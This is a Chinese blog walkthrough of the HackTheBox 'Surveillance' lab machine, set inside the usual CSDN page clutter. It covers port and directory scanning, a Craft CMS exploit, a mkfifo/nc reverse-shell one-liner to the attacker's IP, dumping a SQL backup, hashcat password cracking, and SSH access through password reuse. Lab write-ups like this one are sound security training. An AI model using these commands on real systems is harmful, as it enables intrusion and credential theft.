HTB靶机渗透测试之Surveillance(Linux · Medium)

于 2024-02-02 16:54:42 发布
阅读量1.4k 收藏 21
点赞数 22
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60351808/article/details/135992552
版权

一、信息收集

kali机器ip:10.10.16.53

靶机ip:10.10.11.245

首先nmap拿到基本端口开放信息

Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-02 11:53 CST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 18.26% done; ETC: 11:54 (0:01:03 remaining)
Nmap scan report for surveillance.htb (10.10.11.245)
Host is up (0.48s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
|_  256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title:  Surveillance 
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/2%OT=22%CT=1%CU=37763%PV=Y%DS=2%DC=T%G=Y%TM=65BC67CA
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=8)OPS(
OS:O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11
OS:NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   583.76 ms 10.10.16.1 (10.10.16.1)
2   271.27 ms surveillance.htb (10.10.11.245)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.80 seconds

发现开放了22和80两个端口,22是ssh,渗透优先级靠后,先看看80端口,浏览器访问(省略修改hosts文件步骤)

用紫色小插件看出收集基本信息,得到有效信息craft cms,这是个美国公司开发的内容管理系统,找到一个可能的突破点

接下来对该网站进行目录爆破和子域名爆破,分别使用dirsearch和gobuster

步骤及结果如下

执行该代码
dirsearch -u http://surveillance.htb/
结果:

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )                                                                                 
                                                                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /usr/lib/python3/dist-packages/dirsearch/dirsearch_surveillance.htb.output

Error Log: /root/.dirsearch/logs/errors-24-02-02_14-17-17.log

Target: http://surveillance.htb/

[14:17:20] Starting: 
[14:17:41] 301 -  178B  - /js  ->  http://surveillance.htb/js/
[14:18:33] 200 -    0B  - /.gitkeep                                        
[14:18:37] 200 -  304B  - /.htaccess                                       
[14:22:24] 302 -    0B  - /admin  ->  http://surveillance.htb/admin/login   
[14:22:37] 302 -    0B  - /admin/  ->  http://surveillance.htb/admin/login  
[14:22:37] 302 -    0B  - /admin/?/login  ->  http://surveillance.htb/admin/login
[14:22:39] 302 -    0B  - /admin/admin  ->  http://surveillance.htb/admin/login
[14:22:42] 200 -   38KB - /admin/admin/login                                
[14:22:47] 302 -    0B  - /admin/index  ->  http://surveillance.htb/admin/login
[14:22:49] 200 -   38KB - /admin/login                                      
[14:26:49] 301 -  178B  - /css  ->  http://surveillance.htb/css/            
[14:28:06] 301 -  178B  - /fonts  ->  http://surveillance.htb/fonts/        
[14:28:44] 403 -  564B  - /images/                                          
[14:28:44] 301 -  178B  - /images  ->  http://surveillance.htb/images/
[14:28:45] 301 -  178B  - /img  ->  http://surveillance.htb/img/            
[14:28:53] 200 -    1B  - /index                                            
[14:28:54] 200 -   16KB - /index.php                                        
[14:28:55] 200 -    1B  - /index.php.                                       
[14:29:15] 403 -  564B  - /js/                                              
[14:29:54] 302 -    0B  - /logout  ->  http://surveillance.htb/             
[14:29:55] 302 -    0B  - /logout/  ->  http://surveillance.htb/            
[14:34:55] 200 -    1KB - /web.config                                       
[14:35:09] 418 -   24KB - /wp-admin/                                        
[14:35:09] 418 -   24KB - /wp-admin                                         
                                                                             
Task Completed
                                           
进行子域名爆破
gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -domain devvortex.htb
结果:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     omain
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/02/02 14:05:46 Starting gobuster in DNS enumeration mode
===============================================================

===============================================================
2024/02/02 14:14:07 Finished
===============================================================

gobuster并未检测到子域名,dirsearch倒是爆出不少东西,但研究下来发现并没有什么有用的,于是只能将突破点放到cms上,使用msfconsole搜索看看有没有可用的poc

二、获得立足点

msfconsole

search craft cms 4

有以下结果用第1个试试

use 1
show options
set rhosts http://surveillance.htb/
set lhost 10.10.16.53
run

虽然显示可以利用但总是利用失败,不知道为什么,不过在网上找到了poc,成功利用

但是这个shell并没有交互性且很慢,所以换一个。这边参考了这篇文章(【渗透测试】Surveillance - HackTheBox,网络摄像头渗透+SSH端口转发访问本地资源_hackthebox surveillance-CSDN博客)执行

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.53 4444 >/tmp/f

同时nc -nlvp 4444拿到shell

这边进入到 ../storage/backups文件夹发现一个sql的备份文件,下载下来看看

用python3开web服务下载下来

靶机执行:
python3 -m http.server 8965

kali执行:
http://surveillance.htb:8965/surveillance--2023-10-17-202801--v4.4.14.sql.zip

打开看看有没有什么东西

发现是个dump文件,通过kali自带的mysql进行恢复

service mysql start 
mysql
create database db1
ctrl+z
mysql -uroot -p****** < surveillance--2023-10-17-202801--v4.4.14.sql

恢复后在users表里发现了admin用户,可能存在密码复用,破解试试

用hashcat破解

hashcat passwd.hash /usr/share/wordlists/rockyou.txt -m 1400

拿到密码,通过观察admin用户的名称为Matthew,试试ssh

ssh matthew@10.10.11.245

成功进入

拿到user flag

接下来传入linpeas.sh看看提权

 找到很多密码,但毫无思路,后序参考文章【渗透测试】Surveillance - HackTheBox,网络摄像头渗透+SSH端口转发访问本地资源_hackthebox surveillance-CSDN博客

15m0
关注
  • 22
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTB靶场系列 Windows靶机 Arctic靶机
m0_57221101的博客
01-30 2621
这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT
htb Surveillance wp
mikumiku~
12-12 1223
因为最近想去看live,所以一直在超市兼职打工攒钱导致没时间更新,前段时间看到夏洛克给开了就给打了,可惜漏了一个靶机,还卡住一个和一个疯狂还没打,抽时间最近会抽时间尝试一下疯狂难度的,如果有师傅需要夏洛克机器的wp过程的可以留言一下…
渗透测试Surveillance - HackTheBox,网络摄像头渗透+SSH端口转发访问本地资源
最新发布
m0_74272345的博客
12-15 1185
一个网络摄像头的靶机,部署craftcms WEB服务,本地部署zoneminder服务视频监控web一眼看到是Craft CMS,之前ACTF差不多,直接拿GitHub里面的POC一把梭,拿到www-data权限在Web目录下找到一个数据库备份文件,保存下来在自己的本地重建数据库,发现Matthew用户的hash,密码复用拿到matthew的权限linpeas自动枚举发现很多信息指向zoneminder,针对性的搜索发现zoneminder用nginx部署在本地,使用SSH端口转发。
Hack-The-Box靶机---search
Innocence_0的博客
07-24 127
其中的80,88,135,445,3268是重点要渗透的端口。
HTB靶机011-Node-WP
灰蜗牛
05-12 1680
HTB靶机011-Node-WP,这题比较复杂,最后提权是难点
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
30 天渗透测试练习2.pdf
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB单线策略测试
08-18
本话题我们将深入探讨HTB单线策略测试的相关知识点。 首先,理解HTB的基本原理是至关重要的。HTB算法基于令牌桶理论,通过在虚拟桶中存储令牌来控制发送数据的速率。每个数据包需要一定的令牌才能被发送,当桶中...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 渗透测试通常分为几个阶段,包括信息收集、漏洞扫描、漏洞利用、权限提升、横向移动和持久化等。在Easy级别的靶机中,我们可以...
HTB靶场系列 Windows靶机 Blue靶机
程序员阿飘 的博客
01-10 428
本文已参与「新人创作礼」活动,一起开启掘金创作之路ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限。
HTB靶场系列 linux靶机 Tartarsause靶机
顶峰
12-14 317
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port。那么我们的思路就有了,就是在上述脚本完成备份后休息的那三十秒,我们打开备份,修改其中的某个文件为/root/root.txt然后再把这个备份重新压缩好,把原来的备份删掉,之后打开错误报告查看root文件就是了。注意,端口改自己脚本中的端口,地址的端口最后必须加/
【网络安全】HTB靶机渗透系列之Sniper
m0_59598029的博客
01-06 113
站点中存在两个重要的目录,分别为user和blog,blog目录在语言切换中使用?lang=xx.php,这很大程度上说明可能存在文件包含漏洞;user目录则用于用户注册和登陆账号,在之后的会话利用也帮助我们拿到了sessionid,从而确认了session地址。文件包含漏洞验证成功后我们发现存在两种上线方式,一是本地文件包含利用,即通过包含session位置中注册用户名(PHP代码)来达到代码执行的效果;二是相对简单的远程文件包含利用,即只要在本地放置木马文件请求包含就可获取权限。
HTB靶机:RainyDay
LainWith的博客
11-27 1687
系统:linux难度:困难发布日期:2022/10/16其他信息:2022年10月24日靶场删除了泄露的root的 SSH 密钥,并更改了泄露的root密码。个人打靶发现靶机还删除了python,其他变化尚未发现。补充:这台靶机与Vulnhub靶机较为相似,只是利用起来更复杂很多。
HTB靶机渗透
萍水间人的小天地
02-18 1028
信息收集 这里可以先设置一下hosts文件 10.10.10.168 obscure.htb 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret ...
HTB系列】靶机Teacher的渗透测试详解
大方子
04-27 1360
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
HTB系列】靶机Irked的渗透测试详解
大方子
05-10 2300
介绍 Kali: 10.10.13.32 靶机地址:10.10.10.117 先用nmap扫描下靶机 靶机开放了 22 80 111 端口 查看下靶机的80端口 我们用gobuster对网站的目录也进行一次爆破 访问下/manual,得到apache的文档页面没有可以利用的点 然后我们在根据页面上的显示”IRC i...
HTB系列】靶机Chaos的渗透测试详解
大方子
06-08 1485
HTB系列】靶机Chaos的渗透测试详解 是大方子/2019.6.8/ 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress 修改hosts来对网页邮件系统webmail进行访问 LaTax反弹shell 通过tar来进行限制shell的绕过并修复shell的PATH 用firefox_decrypt提取火狐的用户凭证缓存 介...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值